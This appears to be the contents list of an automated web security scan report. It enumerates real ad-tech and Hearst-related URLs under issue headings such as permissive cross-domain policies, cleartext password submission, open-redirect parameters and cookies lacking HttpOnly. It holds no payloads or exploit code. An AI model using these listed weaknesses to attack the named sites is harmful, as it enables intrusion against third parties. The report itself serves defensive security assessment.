5.51. http://events.seattlepi.com/crossdomain.xml
5.52. http://events.stamfordadvocate.com/crossdomain.xml
5.53. http://external.ak.fbcdn.net/crossdomain.xml
5.54. http://eyewond.fcod.llnwd.net/crossdomain.xml
5.55. http://fls.doubleclick.net/crossdomain.xml
5.56. http://g-pixel.invitemedia.com/crossdomain.xml
5.57. http://g.msn.com/crossdomain.xml
5.58. http://goku.brightcove.com/crossdomain.xml
5.59. http://hearst.112.2o7.net/crossdomain.xml
5.60. http://hearstmagazines.112.2o7.net/crossdomain.xml
5.61. http://hfm.checkm8.com/crossdomain.xml
5.62. http://ib.adnxs.com/crossdomain.xml
5.63. http://image.ugo.com/crossdomain.xml
5.64. http://img.widgets.video.s-msn.com/crossdomain.xml
5.65. http://img1.catalog.video.msn.com/crossdomain.xml
5.66. http://img2.catalog.video.msn.com/crossdomain.xml
5.67. http://img3.catalog.video.msn.com/crossdomain.xml
5.68. http://img4.catalog.video.msn.com/crossdomain.xml
5.69. http://js.revsci.net/crossdomain.xml
5.70. http://load.exelator.com/crossdomain.xml
5.71. http://load.tubemogul.com/crossdomain.xml
5.72. http://loadus.exelator.com/crossdomain.xml
5.73. http://media.fastclick.net/crossdomain.xml
5.74. http://metrics.elle.com/crossdomain.xml
5.75. http://metrics.seattlepi.com/crossdomain.xml
5.76. http://nai.btrll.com/crossdomain.xml
5.77. http://o.sa.aol.com/crossdomain.xml
5.78. http://omnituretrack.local.com/crossdomain.xml
5.79. http://optout.collective-media.net/crossdomain.xml
5.80. http://optout.crwdcntrl.net/crossdomain.xml
5.81. http://optout.invitemedia.com:9030/crossdomain.xml
5.82. http://optout.media6degrees.com/crossdomain.xml
5.83. http://p.brilig.com/crossdomain.xml
5.84. http://pbid.pro-market.net/crossdomain.xml
5.85. http://pix04.revsci.net/crossdomain.xml
5.86. http://pixel.adsafeprotected.com/crossdomain.xml
5.87. http://pixel.fetchback.com/crossdomain.xml
5.88. http://pixel.quantserve.com/crossdomain.xml
5.89. http://privacy.revsci.net/crossdomain.xml
5.90. http://ps2.newsinc.com/crossdomain.xml
5.91. http://r.skimresources.com/crossdomain.xml
5.92. http://r.turn.com/crossdomain.xml
5.93. http://rad.msn.com/crossdomain.xml
5.94. http://recs.richrelevance.com/crossdomain.xml
5.95. http://rp.gwallet.com/crossdomain.xml
5.96. http://s.meebocdn.net/crossdomain.xml
5.97. http://s.xp1.ru4.com/crossdomain.xml
5.98. http://s.ytimg.com/crossdomain.xml
5.99. http://s0.2mdn.net/crossdomain.xml
5.100. http://sana.newsinc.com/crossdomain.xml
5.101. http://sb1.analoganalytics.com/crossdomain.xml
5.102. http://secure-us.imrworldwide.com/crossdomain.xml
5.103. http://sensor2.suitesmart.com/crossdomain.xml
5.104. http://shadow01.yumenetworks.com/crossdomain.xml
5.105. http://spe.atdmt.com/crossdomain.xml
5.106. http://studio-5.financialcontent.com/crossdomain.xml
5.107. http://t.invitemedia.com/crossdomain.xml
5.108. http://tags.bluekai.com/crossdomain.xml
5.109. http://tcr.tynt.com/crossdomain.xml
5.110. http://um.simpli.fi/crossdomain.xml
5.111. http://video.od.visiblemeasures.com/crossdomain.xml
5.112. http://vms.msn.com/crossdomain.xml
5.113. http://widget.newsinc.com/crossdomain.xml
5.114. http://www.burstnet.com/crossdomain.xml
5.115. http://www.casalemedia.com/crossdomain.xml
5.116. http://www.kaboodle.com/crossdomain.xml
5.117. http://www.nexac.com/crossdomain.xml
5.118. http://www.zvents.com/crossdomain.xml
5.119. http://www2.glam.com/crossdomain.xml
5.120. http://y.timesunion.com/crossdomain.xml
5.121. http://ad.wsod.com/crossdomain.xml
5.122. http://ads.adbrite.com/crossdomain.xml
5.123. http://as.serving-sys.com/crossdomain.xml
5.124. http://cim.meebo.com/crossdomain.xml
5.125. http://cm.npc-hearst.overture.com/crossdomain.xml
5.126. http://extras.seattlepi.com/crossdomain.xml
5.127. http://fetchback.com/crossdomain.xml
5.128. http://googleads.g.doubleclick.net/crossdomain.xml
5.129. http://login.dotomi.com/crossdomain.xml
5.130. http://o.aolcdn.com/crossdomain.xml
5.131. http://open.ad.yieldmanager.net/crossdomain.xml
5.132. http://origin.chron.com/crossdomain.xml
5.133. http://p.opt.fimserve.com/crossdomain.xml
5.134. http://rd.meebo.com/crossdomain.xml
5.135. http://syndication.mmismm.com/crossdomain.xml
5.136. http://vid.catalog.newsinc.com/crossdomain.xml
5.137. http://www.adadvisor.net/crossdomain.xml
5.138. http://www.adbrite.com/crossdomain.xml
5.139. http://www.delish.com/crossdomain.xml
5.140. http://www.facebook.com/crossdomain.xml
5.141. http://www.fetchback.com/crossdomain.xml
5.142. http://www.gather.com/crossdomain.xml
5.143. http://www.local.com/crossdomain.xml
5.144. http://www.meebo.com/crossdomain.xml
5.145. http://www.misquincemag.com/crossdomain.xml
5.146. http://www.quickandsimple.com/crossdomain.xml
5.147. http://www.realage.com/crossdomain.xml
5.148. http://www.seventeen.com/crossdomain.xml
5.149. http://www.thedailygreen.com/crossdomain.xml
5.150. http://www.ugo.com/crossdomain.xml
5.151. http://www.youtube-nocookie.com/crossdomain.xml
5.152. http://1663.ic-live.com/crossdomain.xml
5.153. http://api.twitter.com/crossdomain.xml
6. Silverlight cross-domain policy
6.1. http://33across.com/clientaccesspolicy.xml
6.2. http://a.rad.msn.com/clientaccesspolicy.xml
6.3. http://ad.doubleclick.net/clientaccesspolicy.xml
6.4. http://adunit.cdn.auditude.com/clientaccesspolicy.xml
6.5. http://b.rad.msn.com/clientaccesspolicy.xml
6.6. http://b.scorecardresearch.com/clientaccesspolicy.xml
6.7. http://c.delish.com/clientaccesspolicy.xml
6.8. http://c.msn.com/clientaccesspolicy.xml
6.9. http://cdn.eyewonder.com/clientaccesspolicy.xml
6.10. http://dc.kaboodle.com/clientaccesspolicy.xml
6.11. http://edge1.catalog.video.msn.com/clientaccesspolicy.xml
6.12. http://edge3.catalog.video.msn.com/clientaccesspolicy.xml
6.13. http://hearst.112.2o7.net/clientaccesspolicy.xml
6.14. http://hearstmagazines.112.2o7.net/clientaccesspolicy.xml
6.15. http://img.widgets.video.s-msn.com/clientaccesspolicy.xml
6.16. http://img1.catalog.video.msn.com/clientaccesspolicy.xml
6.17. http://img2.catalog.video.msn.com/clientaccesspolicy.xml
6.18. http://img3.catalog.video.msn.com/clientaccesspolicy.xml
6.19. http://img4.catalog.video.msn.com/clientaccesspolicy.xml
6.20. http://metrics.elle.com/clientaccesspolicy.xml
6.21. http://metrics.seattlepi.com/clientaccesspolicy.xml
6.22. http://o.aolcdn.com/clientaccesspolicy.xml
6.23. http://o.sa.aol.com/clientaccesspolicy.xml
6.24. http://omnituretrack.local.com/clientaccesspolicy.xml
6.25. http://pixel.quantserve.com/clientaccesspolicy.xml
6.26. http://rad.msn.com/clientaccesspolicy.xml
6.27. http://s0.2mdn.net/clientaccesspolicy.xml
6.28. http://secure-us.imrworldwide.com/clientaccesspolicy.xml
6.29. http://shadow01.yumenetworks.com/clientaccesspolicy.xml
6.30. http://spe.atdmt.com/clientaccesspolicy.xml
6.31. http://video.od.visiblemeasures.com/clientaccesspolicy.xml
6.32. http://vms.msn.com/clientaccesspolicy.xml
6.33. http://y.timesunion.com/clientaccesspolicy.xml
6.34. http://ts3.mm.bing.net/clientaccesspolicy.xml
6.35. http://choice.atdmt.com/clientaccesspolicy.xml
6.36. http://choice.bing.com/clientaccesspolicy.xml
6.37. http://choice.microsoft.com/clientaccesspolicy.xml
6.38. http://choice.msn.com/clientaccesspolicy.xml
7. Cleartext submission of password
8.5. http://amch.questionmarket.com/adsc/d926534/6/43407814/decide.php [REST URL parameter 1]
8.6. http://amch.questionmarket.com/adsc/d927907/35/43624044/decide.php [REST URL parameter 1]
8.7. http://amch.questionmarket.com/adscgen/d_layer.php [REST URL parameter 1]
8.8. http://amch.questionmarket.com/adscgen/d_layer.php [REST URL parameter 2]
8.9. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [REST URL parameter 1]
8.10. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [REST URL parameter 2]
8.11. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 1]
8.12. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 2]
8.13. http://amch.questionmarket.com/dt/s/28067/0.php [REST URL parameter 1]
8.14. http://amch.questionmarket.com/dt/s/28067/0.php [REST URL parameter 2]
8.15. http://amch.questionmarket.com/dt/s/28067/0.php [REST URL parameter 3]
8.16. http://amch.questionmarket.com/dt/s/28067/0.php [REST URL parameter 4]
8.19. http://hearst.com/about-hearst/corporate-george-r-hearst-jr.php [REST URL parameter 1]
8.20. http://hearst.com/about-hearst/corporate-george-r-hearst-jr.php [REST URL parameter 2]
8.21. http://hearst.com/about-hearst/corporate-mark-e-aldam.php [REST URL parameter 1]
8.22. http://hearst.com/about-hearst/corporate-mark-e-aldam.php [REST URL parameter 2]
8.23. http://hearst.com/about-hearst/index.php [REST URL parameter 1]
8.24. http://hearst.com/about-hearst/index.php [REST URL parameter 2]
8.25. http://hearst.com/flash/slideshow-newspapers.swf [REST URL parameter 1]
8.26. http://hearst.com/flash/slideshow-newspapers.swf [REST URL parameter 2]
8.27. http://hearst.com/newspapers/albany-times-union.php [REST URL parameter 1]
8.28. http://hearst.com/newspapers/albany-times-union.php [REST URL parameter 2]
8.29. http://hearst.com/newspapers/hearst-news-service.php [REST URL parameter 1]
8.30. http://hearst.com/newspapers/hearst-news-service.php [REST URL parameter 2]
8.31. http://hearst.com/newspapers/index.php [REST URL parameter 1]
8.32. http://hearst.com/newspapers/index.php [REST URL parameter 2]
8.33. http://hearst.com/newspapers/localedge.php [REST URL parameter 1]
8.34. http://hearst.com/newspapers/localedge.php [REST URL parameter 2]
8.35. http://hearst.com/newspapers/metrix4media.php [REST URL parameter 1]
8.36. http://hearst.com/newspapers/metrix4media.php [REST URL parameter 2]
8.37. http://hearst.com/newspapers/seattlepicom.php [REST URL parameter 1]
8.38. http://hearst.com/newspapers/seattlepicom.php [REST URL parameter 2]
8.39. http://hearst.com/newspapers/the-advocate.php [REST URL parameter 1]
8.40. http://hearst.com/newspapers/the-advocate.php [REST URL parameter 2]
8.41. http://hearst.com/press-room/index.php [REST URL parameter 1]
8.42. http://hearst.com/press-room/index.php [REST URL parameter 2]
8.43. http://hearst.com/press-room/pr-20110817a.php [REST URL parameter 1]
8.44. http://hearst.com/press-room/pr-20110817a.php [REST URL parameter 2]
8.45. http://img.widgets.video.s-msn.com/resource.aspx [responseEncoding parameter]
8.46. http://js.bizographics.com/show_ad.js [REST URL parameter 1]
8.47. http://load.exelator.com/load/OptOut.php [REST URL parameter 1]
8.48. http://load.exelator.com/load/OptOut.php [REST URL parameter 2]
8.49. http://loadus.exelator.com/load/ [REST URL parameter 1]
8.50. http://origin.chron.com/apps/audit/ads.gif [REST URL parameter 1]
8.51. http://origin.chron.com/apps/audit/ads.gif [REST URL parameter 2]
8.52. http://origin.chron.com/apps/audit/ads.gif [REST URL parameter 3]
8.53. http://pixel.quantserve.com/api/segments.json [REST URL parameter 1]
8.54. http://pixel.quantserve.com/api/segments.json [REST URL parameter 2]
8.55. http://pixel.quantserve.com/optout_set [REST URL parameter 1]
8.56. http://pixel.quantserve.com/optout_status [REST URL parameter 1]
8.57. http://pixel.quantserve.com/optout_verify [REST URL parameter 1]
8.58. http://platform.twitter.com/widgets/follow_button.html [REST URL parameter 1]
8.59. http://platform.twitter.com/widgets/follow_button.html [REST URL parameter 2]
8.60. http://platform.twitter.com/widgets/images/f.gif [REST URL parameter 1]
8.61. http://platform.twitter.com/widgets/images/f.gif [REST URL parameter 2]
8.62. http://platform.twitter.com/widgets/images/f.gif [REST URL parameter 3]
8.63. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 1]
8.64. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 2]
8.65. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 3]
8.66. http://s.meebocdn.net/cim/script/feeds_v92_cim_11_12_5.en.js [REST URL parameter 1]
8.67. http://s.meebocdn.net/cim/script/feeds_v92_cim_11_12_5.en.js [REST URL parameter 2]
8.68. http://s.meebocdn.net/cim/script/feeds_v92_cim_11_12_5.en.js [REST URL parameter 3]
8.69. http://s.ytimg.com/yt/swfbin/cps-vflP_j6Bm.swf [REST URL parameter 2]
8.70. http://s.ytimg.com/yt/swfbin/cps-vflP_j6Bm.swf [REST URL parameter 3]
8.71. http://tcr.tynt.com/javascripts/Tracer.js [REST URL parameter 1]
8.72. http://tcr.tynt.com/javascripts/Tracer.js [REST URL parameter 2]
8.73. http://widget.newsinc.com/_fw/common/toppicks_common1.html [REST URL parameter 1]
8.74. http://widget.newsinc.com/_fw/common/toppicks_common1.html [REST URL parameter 2]
8.75. http://widget.newsinc.com/_fw/common/toppicks_common1.html [REST URL parameter 3]
8.76. http://widget.newsinc.com/ndn_toppicks.html [REST URL parameter 1]
8.77. http://www.nexac.com/nai_optout.php [REST URL parameter 1]
8.78. http://www.nexac.com/nai_status.php [REST URL parameter 1]
9.2. http://advertising.aol.com/nai/nai.php
9.3. http://bh.contextweb.com/bh/set.aspx
9.4. http://info.yahoo.com/nai/nai-status.html
9.5. http://info.yahoo.com/nai/nai-verify.html
9.6. http://info.yahoo.com/nai/optout.html
9.7. http://l.sharethis.com/pview
9.8. http://nai.ad.us-ec.adtechus.com/nai/daa.php
9.9. http://nai.adserver.adtechus.com/nai/daa.php
9.10. http://nai.adserverec.adtechus.com/nai/daa.php
9.11. http://nai.adserverwc.adtechus.com/nai/daa.php
9.12. http://nai.adsonar.com/nai/daa.php
9.13. http://nai.adtech.de/nai/daa.php
9.14. http://nai.advertising.com/nai/daa.php
9.15. http://nai.glb.adtechus.com/nai/daa.php
9.16. http://nai.tacoda.at.atwola.com/nai/daa.php
9.17. http://rs.gwallet.com/r1/pixel/x1743
9.18. http://www.facebook.com/extern/login_status.php
9.19. http://www.meebo.com/mcmd/events
9.20. http://www.meebo.com/mcmd/subscribe
9.21. http://www.networkadvertising.org/managing/optout_results.asp
9.22. http://www.networkadvertising.org/yahoo_handler
10. Password field submitted using GET method
11.1. http://a.tribalfusion.com/z/i.optout [success parameter]
11.2. http://a1.interclick.com/CookieCheck.aspx [optOut parameter]
11.3. http://a1.interclick.com/optOut.aspx [fail parameter]
11.4. http://login.dotomi.com/ucm/UCMController [redir_url parameter]
11.5. http://nai.ad.us-ec.adtechus.com/nai/daa.php [rd parameter]
11.6. http://nai.adserver.adtechus.com/nai/daa.php [rd parameter]
11.7. http://nai.adserverec.adtechus.com/nai/daa.php [rd parameter]
11.8. http://nai.adserverwc.adtechus.com/nai/daa.php [rd parameter]
11.9. http://nai.adsonar.com/nai/daa.php [rd parameter]
11.10. http://nai.adtech.de/nai/daa.php [rd parameter]
11.11. http://nai.advertising.com/nai/daa.php [rd parameter]
11.12. http://nai.glb.adtechus.com/nai/daa.php [rd parameter]
11.13. http://nai.tacoda.at.atwola.com/nai/daa.php [rd parameter]
11.14. http://optout.crwdcntrl.net/optout [d parameter]
11.15. http://privacy.revsci.net/optout/optoutv.aspx [p parameter]
12. Cookie scoped to parent domain
12.1. http://api.twitter.com/1/statuses/user_timeline.json
12.2. http://optout.mookie1.com/optout/nai/
12.3. http://www.gather.com/URI%20SYNTAX%20EXCEPTION
12.4. http://a.collective-media.net/
12.5. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default
12.6. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home
12.7. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home
12.8. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo
12.9. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default
12.10. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home
12.11. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home
12.12. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo
12.13. http://a.collective-media.net/datapair
12.14. http://a.collective-media.net/favicon.ico
12.15. http://a.netmng.com/hic/
12.16. http://a.netmng.com/opt-out.php
12.18. http://a.rfihub.com/nai_opt_out_1.gif
12.19. http://a.tribalfusion.com/j.ad
12.20. http://a.tribalfusion.com/z/i.optout
12.21. http://ad.agkn.com/iframe!t=1089!
12.22. http://ad.auditude.com/adserver
12.23. http://ad.auditude.com/adserver
12.24. http://ad.auditude.com/adserver
12.25. http://ad.auditude.com/adserver
12.26. http://ad.auditude.com/adserver
12.27. http://ad.auditude.com/adserver
12.28. http://ad.auditude.com/adserver
12.29. http://ad.auditude.com/adserver
12.30. http://ad.auditude.com/adserver
12.31. http://ad.auditude.com/adserver
12.32. http://ad.auditude.com/adserver
12.33. http://ad.doubleclick.net/ad/N4478.hearst.comOX2468/B5477179.4
12.34. http://ad.doubleclick.net/ad/N4478.hearst.comOX2468/B5477179.87
12.35. http://ad.doubleclick.net/ad/N4478.hearst.comOX2468/B5477179.88
12.36. http://ad.doubleclick.net/ad/N5823.131643.MEEBO/B5733109.2
12.37. http://ad.doubleclick.net/ad/N6482.3508.THESEATTLETIMES-POSTI/B5865206
12.38. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5
12.39. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.30
12.40. http://ad.doubleclick.net/adj/DY146/ron_lifestyle
12.41. http://ad.doubleclick.net/adj/N5295.SD128132N5295SN0/B5753751.3
12.42. http://ad.doubleclick.net/adj/hdm.answerology/
12.43. http://ad.doubleclick.net/adj/hdm.donatemydress/
12.44. http://ad.doubleclick.net/adj/hdm.misquincemag/other/
12.45. http://ad.doubleclick.net/adj/hdm.quicksimple/answerology/
12.46. http://ad.doubleclick.net/adj/hdm.quicksimple/other/
12.47. http://ad.doubleclick.net/adj/hdm.seventeen/other/
12.48. http://ad.doubleclick.net/adj/hdm.thedailygreen/other/
12.49. http://ad.doubleclick.net/adj/hfmus.eg.hp/landingpage
12.50. http://ad.doubleclick.net/adj/locm.hp
12.51. http://ad.doubleclick.net/adj/ugo.ugo.ugohome/ugohome
12.53. http://ads.adbrite.com/adserver/vdi/762701
12.54. http://ads.amgdgt.com/ads/opt-out
12.55. http://adserver.teracent.net/tase/ad
12.56. http://adserver.teracent.net/tase/redir/1316276657094_138127931_as3105_imp/vew
12.57. http://adserver.teracent.net/tase/redir/1316277335242_138208257_as3106_imp/vew
12.58. http://adserver.teracent.net/tase/redir/1316277342661_138301358_as3101_imp/vew
12.59. http://adserver.teracent.net/tase/redir/1316277704500_138214252_as3105_imp/vew
12.60. http://adserver.teracent.net/tase/redir/1316277704500_138372278_as3100_imp/vew
12.61. http://adserver.teracent.net/tase/redir/1316277712246_66815854_as3102_imp/vew
12.62. http://adserver.teracent.net/tase/redir/1316278116134_138322589_as3104_imp/vew
12.63. http://amch.questionmarket.com/adsc/d926534/6/43407795/decide.php
12.64. http://amch.questionmarket.com/adsc/d926534/6/43407799/decide.php
12.65. http://amch.questionmarket.com/adsc/d926534/6/43407814/decide.php
12.66. http://amch.questionmarket.com/adsc/d927907/35/43624044/decide.php
12.67. http://amch.questionmarket.com/adscgen/dynamiclink.js.php
12.68. http://api.aggregateknowledge.com/optout2
12.69. http://api.agkn.com/optout2
12.70. http://api.choicestream.com/instr/crunch/almondnet/seg
12.71. http://apis.google.com/js/plusone.js
12.72. http://ats.tumri.net/ats/optout
12.73. http://b.scorecardresearch.com/b
12.74. http://b.scorecardresearch.com/p
12.75. http://b.scorecardresearch.com/r
12.76. http://bh.contextweb.com/bh/rtset
12.77. http://bh.contextweb.com/bh/set.aspx
12.78. http://ce.lijit.com/merge
12.79. http://cm.npc-hearst.overture.com/js_1_0/
12.80. http://d.agkn.com/iframe!t=747!
12.81. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/9033442320916087634/mchpid/9/url/
12.85. http://d7.zedo.com/bar/v16-507/d3/jsc/gl.js
12.86. http://d7.zedo.com/img/bh.gif
12.87. http://hearstmagazines.112.2o7.net/b/ss/hmagglobal/1/H.22.1--NS/0
12.88. http://ib.adnxs.com/getuid
12.89. http://ib.adnxs.com/seg
12.90. http://idpix.media6degrees.com/orbserv/hbpix
12.91. http://image2.pubmatic.com/AdServer/Pug
12.92. http://img.pulsemgr.com/optout
12.93. http://leadback.advertising.com/adcedge/lb
12.94. http://load.exelator.com/load/OptOut.php
12.95. http://loadm.exelator.com/load/
12.96. http://nai.btrll.com/nai/optout
12.97. http://notrack.adviva.net/CookieCheck.php
12.98. http://notrack.specificclick.net/CookieCheck.php
12.99. http://notrack.specificmedia.com/CookieCheck.php
12.100. http://oo.afy11.net/NAIOptOut.aspx
12.101. http://optout.33across.com/api/
12.102. http://optout.adlegend.com/nai/optout.php
12.103. http://optout.crwdcntrl.net/optout
12.104. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl
12.105. http://optout.imiclk.com/cgi/optout.cgi
12.106. http://optout.mookie1.decdna.net/optout/nai/
12.107. http://optout.mookie1.decideinteractive.com/optout/nai/
12.108. http://optout.mookie1.dtfssearch.com/optout/nai/
12.109. http://optout.mookie1.pm14.com/optout/nai/
12.110. http://optout.mxptint.net/naioptout.ashx
12.111. http://optout.xgraph.net/optout.gif.jsp
12.112. http://p.brilig.com/contact/optout
12.113. http://pbid.pro-market.net/engine
12.114. http://pix04.revsci.net/F09828/a4/0/0/0.js
12.115. http://pix04.revsci.net/F09828/b3/0/3/1008211/677164118.js
12.116. http://pix04.revsci.net/I09837/b3/0/3/0902121/486412827.js
12.117. http://pix04.revsci.net/I09839/b3/0/3/1008211/194305936.js
12.118. http://pixel.fetchback.com/serve/fb/optout
12.119. http://pixel.quantserve.com/optout_set
12.120. http://pixel.quantserve.com/pixel
12.121. http://pixel.rubiconproject.com/tap.php
12.122. http://privacy.revsci.net/optout/optout.aspx
12.123. http://px.owneriq.net/naioptout
12.124. http://r.openx.net/set
12.125. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/9tOMO
12.126. http://rp.gwallet.com/r1/optout
12.127. http://rs.gwallet.com/r1/pixel/x1743
12.128. http://rt.legolas-media.com/lgrt
12.129. http://s.xp1.ru4.com/coop
12.130. http://sensor2.suitesmart.com/sensor4.js
12.131. http://tag.contextweb.com/TagPublish/GetAd.aspx
12.132. http://tag.contextweb.com/TagPublish/getjs.aspx
12.146. http://www.adadvisor.net/nai/optout
12.147. http://www.adbrite.com/mb/nai_optout.php
12.148. http://www.addthis.com/api/nai/optout
12.149. http://www.bizographics.com/nai/optout
12.150. http://www.burstnet.com/cgi-bin/opt_out.cgi
12.151. http://www.burstnet.com/enlightn/8117//3E06/
12.152. http://www.burstnet.com/enlightn/8171//99D2/
12.153. http://www.foxreno.com/2011/0915/29196544_320X240.jpg
12.155. http://www.mediaplex.com/optout_pure.php
12.156. http://www.mediaplex.com/optout_pure.php
12.157. http://www.nexac.com/nai_optout.php
12.158. http://www.seventeen.com/cm/shared/images/logos/hearst-teen-logo-white.gif
12.159. http://www2.glam.com/app/site/affiliate/nc/g-optout.act
13. Cookie without HttpOnly flag set
13.1. http://ads.adxpose.com/ads/ads.js
13.2. http://afe.specificclick.net/
13.3. http://afe.specificclick.net/serve/v=5
13.4. http://event.adxpose.com/event.flow
13.5. http://nai.ad.us-ec.adtechus.com/nai/daa.php
13.6. http://nai.adserver.adtechus.com/nai/daa.php
13.7. http://nai.adserverec.adtechus.com/nai/daa.php
13.8. http://nai.adserverwc.adtechus.com/nai/daa.php
13.9. http://nai.adsonar.com/nai/daa.php
13.10. http://nai.adtech.de/nai/daa.php
13.11. http://nai.advertising.com/nai/daa.php
13.12. http://nai.glb.adtechus.com/nai/daa.php
13.13. http://nai.tacoda.at.atwola.com/nai/daa.php
13.14. http://optout.mookie1.com/optout/nai/
13.15. http://pixel.adsafeprotected.com/jspix
13.16. http://syn.verticalacuity.com/varw/getPromo
13.17. http://tag.admeld.com/nai-opt-out
13.18. http://www.gather.com/URI%20SYNTAX%20EXCEPTION
13.19. http://www.stamfordadvocatedailydeals.com/favicon.ico
13.21. http://www.ugo.com/takeover/takeover.js
13.22. http://a.collective-media.net/
13.23. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default
13.24. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home
13.25. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home
13.26. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo
13.27. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default
13.28. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home
13.29. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home
13.30. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo
13.31. http://a.collective-media.net/datapair
13.32. http://a.collective-media.net/favicon.ico
13.33. http://a.netmng.com/hic/
13.34. http://a.netmng.com/opt-out.php
13.36. http://a.rfihub.com/nai_opt_out_1.gif
13.37. http://a.tribalfusion.com/j.ad
13.38. http://a.tribalfusion.com/z/i.optout
13.39. http://ad.agkn.com/iframe!t=1089!
13.40. http://ad.doubleclick.net/ad/N4478.hearst.comOX2468/B5477179.4
13.41. http://ad.doubleclick.net/ad/N4478.hearst.comOX2468/B5477179.87
13.42. http://ad.doubleclick.net/ad/N4478.hearst.comOX2468/B5477179.88
13.43. http://ad.doubleclick.net/ad/N5823.131643.MEEBO/B5733109.2
13.44. http://ad.doubleclick.net/ad/N6482.3508.THESEATTLETIMES-POSTI/B5865206
13.45. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5
13.46. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.30
13.47. http://ad.doubleclick.net/adj/DY146/ron_lifestyle
13.48. http://ad.doubleclick.net/adj/N5295.SD128132N5295SN0/B5753751.3
13.49. http://ad.doubleclick.net/adj/hdm.answerology/
13.50. http://ad.doubleclick.net/adj/hdm.donatemydress/
13.51. http://ad.doubleclick.net/adj/hdm.misquincemag/other/
13.52. http://ad.doubleclick.net/adj/hdm.quicksimple/answerology/
13.53. http://ad.doubleclick.net/adj/hdm.quicksimple/other/
13.54. http://ad.doubleclick.net/adj/hdm.seventeen/other/
13.55. http://ad.doubleclick.net/adj/hdm.thedailygreen/other/
13.56. http://ad.doubleclick.net/adj/hfmus.eg.hp/landingpage
13.57. http://ad.doubleclick.net/adj/locm.hp
13.58. http://ad.doubleclick.net/adj/ugo.ugo.ugohome/ugohome
13.60. http://ad.yieldmanager.com/imp
13.61. http://ad.yieldmanager.com/pixel
13.62. http://admonkey.dapper.net/PixelMonkey
13.63. http://ads.adbrite.com/adserver/vdi/762701
13.64. http://ads.amgdgt.com/ads/opt-out
13.65. http://ads.undertone.com/aj
13.66. http://ads.undertone.com/l
13.67. http://ads.undertone.com/l
13.68. http://adserver.teracent.net/tase/ad
13.69. http://adserver.teracent.net/tase/redir/1316276657094_138127931_as3105_imp/vew
13.70. http://adserver.teracent.net/tase/redir/1316277335242_138208257_as3106_imp/vew
13.71. http://adserver.teracent.net/tase/redir/1316277342661_138301358_as3101_imp/vew
13.72. http://adserver.teracent.net/tase/redir/1316277704500_138214252_as3105_imp/vew
13.73. http://adserver.teracent.net/tase/redir/1316277704500_138372278_as3100_imp/vew
13.74. http://adserver.teracent.net/tase/redir/1316277712246_66815854_as3102_imp/vew
13.75. http://adserver.teracent.net/tase/redir/1316278116134_138322589_as3104_imp/vew
13.76. http://adsfac.us/ag.asp
13.77. http://amch.questionmarket.com/adsc/d926534/6/43407795/decide.php
13.78. http://amch.questionmarket.com/adsc/d926534/6/43407799/decide.php
13.79. http://amch.questionmarket.com/adsc/d926534/6/43407814/decide.php
13.80. http://amch.questionmarket.com/adsc/d927907/35/43624044/decide.php
13.81. http://amch.questionmarket.com/adscgen/dynamiclink.js.php
13.82. http://api.aggregateknowledge.com/optout2
13.83. http://api.agkn.com/optout2
13.84. http://api.choicestream.com/instr/crunch/almondnet/seg
13.85. http://api.twitter.com/1/statuses/user_timeline.json
13.86. http://apis.google.com/js/plusone.js
13.87. http://ar.atwola.com/atd
13.88. http://ats.tumri.net/ats/optout
13.89. http://b.scorecardresearch.com/b
13.90. http://b.scorecardresearch.com/p
13.91. http://b.scorecardresearch.com/r
13.92. http://bh.contextweb.com/bh/rtset
13.93. http://bh.contextweb.com/bh/set.aspx
13.96. http://cdn4.specificclick.net/optout.php
13.97. http://ce.lijit.com/merge
13.98. http://cm.npc-hearst.overture.com/js_1_0/
13.99. http://csc.beap.ad.yieldmanager.net/i
13.100. http://d.agkn.com/iframe!t=747!
13.101. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/9033442320916087634/mchpid/9/url/
13.105. http://d7.zedo.com/bar/v16-507/d3/jsc/gl.js
13.106. http://d7.zedo.com/img/bh.gif
13.107. http://data.cmcore.com/imp
13.108. http://domdex.com/nai_optout.php
13.109. http://hearstmagazines.112.2o7.net/b/ss/hmagglobal,hmagthedailygreen/1/H.22.1/s9643802732229
13.110. http://hearstmagazines.112.2o7.net/b/ss/hmagglobal/1/H.22.1--NS/0
13.111. http://hfm.checkm8.com/adam/detect
13.112. http://hfm.checkm8.com/adam/detect
13.113. http://hfm.checkm8.com/adam/detected
13.114. http://idpix.media6degrees.com/orbserv/hbpix
13.115. http://image2.pubmatic.com/AdServer/Pug
13.116. http://img.pulsemgr.com/optout
13.117. http://leadback.advertising.com/adcedge/lb
13.118. http://load.exelator.com/load/OptOut.php
13.119. http://loadm.exelator.com/load/
13.120. http://nai.btrll.com/nai/optout
13.121. http://notrack.adviva.net/CookieCheck.php
13.122. http://notrack.specificclick.net/CookieCheck.php
13.123. http://notrack.specificmedia.com/CookieCheck.php
13.124. http://oo.afy11.net/NAIOptOut.aspx
